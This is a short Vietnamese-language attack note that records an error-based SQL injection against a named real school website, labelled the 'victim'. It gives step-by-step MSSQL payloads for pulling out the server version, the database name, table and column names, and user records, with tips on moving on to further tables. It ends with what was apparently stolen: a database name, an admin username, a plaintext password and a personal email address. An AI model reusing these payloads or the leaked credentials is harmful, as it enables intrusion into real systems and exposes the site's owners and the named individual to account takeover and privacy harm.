victim http://thptnguyenthaibinh.edu.vn' and 1=convert(int,@@version))-- - v

1. victim http://thptnguyenthaibinh.edu.vn
2.  
3. ' and 1=convert(int,@@version))-- - version
4. 'and 1=convert(int,db_name()))-- - database
5. ' and 1=convert(int,(select top 1 table_name from information_schema.tables)))-- -
6. ta thêm where table_name not in('table vừa tìm được') sau chử tables.. để tiềm thêm các table(table bên cạnh)
7. (lưu ý) nếu như chưa có table chúng ta cần thì tiếp tục theo vào và nhớ thêm dấu , khi khai thác các table tiếp theo
8. -- nhìn kỷ đoạn này nhá ..vì rất là dể quên à--
9. 'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('table cần khai thác'))))-- -
10. vd như nảy ta ckeck dc tbuser thì thêm vào đó là ('tbuser')
11. nếu ta mún khai thác cloum cạnh bên thì thêm and column_name not in ('cái mới vừa được khai thác'))))-- -
12. giờ tìm user nhá 'and 1=convert(int,(select top 1 ten from tbuser)))-- -
13. -- nhớ kỷ ten và user nha.. ghi theo cái mà ta khai thac được
14. version :
15. database : dvgtgt_ptthntb
16. table:tbDownloadNd
17. colum:
18. user:admin
19. pass:nputntb123'
20. email :lequoccong@gmail.com